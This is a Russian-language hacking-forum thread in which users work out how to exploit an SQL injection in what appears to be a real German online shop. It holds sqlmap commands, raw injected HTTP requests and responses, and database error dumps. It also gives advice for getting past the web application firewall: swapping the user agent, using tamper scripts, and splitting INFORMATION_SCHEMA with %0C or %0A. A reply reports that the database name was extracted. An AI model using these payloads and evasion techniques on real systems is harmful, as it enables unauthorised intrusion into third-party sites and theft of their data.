• XSS.stack #1 – первый литературный журнал от юзеров форума

Помогите с sql inj

Отслеживать
Ott_Fon_Bismark

Ott_Fon_Bismark

(L3) cache
Забанен
Регистрация
18.09.2020
Сообщения
168
Реакции
50
Пожалуйста, обратите внимание, что пользователь заблокирован
Приветствую смотрите мапа не раскручивает инж
The vulnerability affects
https://target.com//shop_landwahl_modal.php , spr

Discovered by SQL injection
Attack Details
arrow_drop_up

URL encoded GET input spr was set to 1'"

Error message found:

You have an error in your SQL syntax

GET /shop_landwahl_modal.php?spr=1'" HTTP/1.1
Referer: https://target.com/
Cookie: flexxtrsid=rgd9sdpqit2ahu9b3nb07ufpr3;FlexxTradeuserSID=b36ad43f-dc24-7c44-653f-d6f688e6b27e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: https://target.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

sqlmap -u "https://target.com/360viewer/index.php?artnr=16123&spr=1" -p spr --random-agent --batch --level=5 --risk 3 --dbms=MySQL
прошу дать совет по этому поводу
 
Через -v 6 смотри ответ если много 403 значит ваф и нужно юзать тамперы. Если ошибку показывает но не раскручивает то фальш позитив или надо руками правильный запрос составить и потом через prefix suffix указать скулмэпу как надо
Помогает часто в sqlmap --skip-urlencode и --tamper=space2comment
Еще можно тампер between но это больше для слепых.
Ошибка то есть вобще? Запрос показывает?
 
Копирни текст ошибки сюда проще будет понять. Sqlmap это по сути брут всех возможных пеилоадов без понимания какои там запрос к базе сложно что то советовать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
buyacc сказал(а):
Копирни текст ошибки сюда проще будет понять. Sqlmap это по сути брут всех возможных пеилоадов без понимания какои там запрос к базе сложно что то советовать
HTTP request [#1392]:
GET /360viewer/index.php?artnr=16123&spr=1%60%3D%601%60%3BSELECT%20%28CASE%20WHEN%20%286546%3D6546%29%20THEN%206546%20ELSE%206546%2A%28SELECT%206546%20FROM%20INFORMATION_SCHEMA.PLUGINS%29%20END%29%23 HTTP/1.1
Cache-Control: no-cache
User-Agent: Opera/9.4 (Windows NT 6.1; U; en)
Referer: https://www.target.com360viewer/index.php
Host: www.target.com
Cookie: flexxtrsid=knuufb2r09ppfr771b3bmg0br6
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close

HTTP response [#1392] (403 Forbidden):
Date: Tue, 21 Nov 2023 12:48:32 GMT
Server: Apache (custom)
Content-Length: 272
Connection: close
Content-Type: text/html; charset=iso-8859-1
URI: https://https//www.target.com/360viewer/index.php?artnr=16123&spr=1`=`1`;SELECT (CASE WHEN (6546=6546) THEN 6546 ELSE 6546*(SELECT 6546 FROM INFORMATION_SCHEMA.PLUGINS) END)#
кажись нашел сохранил лог и 400 с лишним запросом блокирует нечто(предположительно просто файрволл сервера апач) хочу заметить что не все запросы блокирует а значит возможно в этом и порблема,там несколько скуль и все перепробывал может из-за этого ничего не пашет, через -r запрос добавлял и прочие советы проверил но все равно спасибо, хотелось бы услышать небольшой фидбек
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
HTTP/1.1 200 OK
Date: Sat, 18 Nov 2023 08:31:21 GMT
Server: Apache (custom)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Length: 2584
Keep-Alive: timeout=4, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Original-Content-Encoding: gzip

</td></tr></table><b>Database error:</b> Invalid SQL: SELECT _flexxtrader_artikel.artikel_id as artikel_id,
_flexxtrader_artikel.artikel_nr as artnr,
_flexxtrader_artikel.bezeichnung_1'" as bez,
_flexxtrader_artikel.bezeichnung as bez_de,
_flexxtrader_artikel.bezeichnung_EN as bez_en,
_flexxtrader_artikel.ausfuehrung_1'" as ausfuehrung,
_flexxtrader_artikel.ausfuehrung as ausfuehrung_de,
_flexxtrader_artikel.ausfuehrung_EN as ausfuehrung_en,
_flexxtrader_artikel.kurztext_1'" as kt,
_flexxtrader_artikel.kurztext as kt_de,
_flexxtrader_artikel.produkttext_1'" as pt,
_flexxtrader_artikel.produkttext as pt_de,
_flexxtrader_artikel.lager_bestand as bestand,
_flexxtrader_artikel.lager_bestandsmeldung as bestandsmeldung,
_flexxtrader_artikel.lager_dauergelb as dauergelb,
_flexxtrader_artikel.lager_dauergruen as dauergruen,
_flexxtrader_artikel.lieferzeit_tage as lieferzeit_tage,
_flexxtrader_artikel.preis as preis,
_flexxtrader_artikel.preis_netto as preis_netto,
_flexxtrader_artikel.gewicht as gewicht,
_flexxtrader_artikel.aktiv_jn,
_flexxtrader_artikel.topartikel_jn,
_flexxtrader_artikel.aktion_jn,
_flexxtrader_artikel.aktion_von,
_flexxtrader_artikel.aktion_bis,
_flexxtrader_artikel.aktionspreis,
_flexxtrader_artikel.rabatt_prozent,
_flexxtrader_artikel.rabatt_betrag,
_flexxtrader_artikel.bild as bild,
_flexxtrader_artikel.schnittzeichnung as sz,
_flexxtrader_artikel.schnittzeichnung_index as si,
_flexxtrader_artikel.change_date as change_date,
_flexxtrader_artikel.crosspromo,
_flexxtrader_artikel.qualitaet as Q,
_flexxtrader_artikel.packungsinhalt as BN,
_flexxtrader_artikel.kfzarray_namen as kfzarray_namen,
_flexxtrader_artikel.bild360_jn,
_flexxtrader_versandklassen.vklasse_id,
_flexxtrader_versandklassen.versandklasse,
_flexxtrader_versandklassen.infotext,
_flexxtrader_versandklassen.aufschlag_zone0,
_flexxtrader_versandklassen.aufschlag_zone1,
_flexxtrader_versandklassen.aufschlag_zone2,
_flexxtrader_versandklassen.aufschlag_zone3,
_flexxtrader_versandklassen.aufschlag_zone4
From _flexxtrader_artikel
Left Join _flexxtrader_versandklassen ON _flexxtrader_artikel.vklasse_id = _flexxtrader_versandklassen.vklasse_id
where _flexxtrader_artikel.artikel_nr='16123'<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '" as ausfuehrung,
_flexxtrader_artikel.ausfuehrung as ausfuehrung_de,
_flexx' at line 3)<br>
Session halted.
 
Мы все зря потели.. 🥲

Во первых, инъекция там детектится без всяких тамперов, достаточно указать --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" или любой другой актуальный (последний) юзер-агент и 403 перестанет отдавать.

Во вторых, WAF там блокирует только INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.SCHEMATA. Для обхода достаточно подавать так: INFORMATION_SCHEM%0CA.SCHEMATA, либо вместо %0C можно так же юзать %0A.

Выводится имя БД: db_franzose_webshop_miq
Но при попытке получить таблицы: MySQL Error: 1142 SELECT command denied to user 'fd8o5bhiuifjnb64'@'localhost'

На этом наши полномочия все, окончены.
Сайт ты спалил в прошлых сообщениях, увидеть я его успел до того как ты подтёр.
 
c0d3x сказал(а):
Мы все зря потели.. 🥲

Во первых, инъекция там детектится без всяких тамперов, достаточно указать --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" или любой другой актуальный (последний) юзер-агент и 403 перестанет отдавать.

Во вторых, WAF там блокирует только INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.SCHEMATA. Для обхода достаточно подавать так: INFORMATION_SCHEM%0CA.SCHEMATA, либо вместо %0C можно так же юзать %0A.

Выводится имя БД: db_franzose_webshop_miq
Но при попытке получить таблицы: MySQL Error: 1142 SELECT command denied to user 'fd8o5bhiuifjnb64'@'localhost'

На этом наши полномочия все, окончены.
Сайт ты спалил в прошлых сообщениях, увидеть я его успел до того как ты подтёр.
Скрытый контент для пользователей: c0d3x.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
c0d3x сказал(а):
Мы все зря потели.. 🥲

Во первых, инъекция там детектится без всяких тамперов, достаточно указать --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" или любой другой актуальный (последний) юзер-агент и 403 перестанет отдавать.

Во вторых, WAF там блокирует только INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.SCHEMATA. Для обхода достаточно подавать так: INFORMATION_SCHEM%0CA.SCHEMATA, либо вместо %0C можно так же юзать %0A.

Выводится имя БД: db_franzose_webshop_miq
Но при попытке получить таблицы: MySQL Error: 1142 SELECT command denied to user 'fd8o5bhiuifjnb64'@'localhost'

На этом наши полномочия все, окончены.
Сайт ты спалил в прошлых сообщениях, увидеть я его успел до того как ты подтёр.

Скрытый контент для пользователей: c0d3x.
 
kimasto сказал(а):
Скрытое содержимое
Да, с юзер-агентом гугл бота тоже пускает.

Ott_Fon_Bismark сказал(а):
Скрытое содержимое
Инжекти сюда:
Скрытый контент для пользователей: .
Тампер который будет менять пейлоад (например INFORMATION_SCHEMA.SCHEMATA на INFORMATION_SCHEM%0AA.SCHEMATA) можно реализовать так: https://xss.pro/threads/14482/post-574451
 
Пожалуйста, обратите внимание, что пользователь заблокирован
c0d3x сказал(а):
Скрытый контент для пользователей: c0d3x.
Да, с юзер-агентом гугл бота тоже пускает.


Инжекти сюда:
Скрытое содержимоеТампер который будет менять пейлоад (например INFORMATION_SCHEMA.SCHEMATA на INFORMATION_SCHEM%0AA.SCHEMATA) можно реализовать так: https://xss.pro/threads/14482/post-574451
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх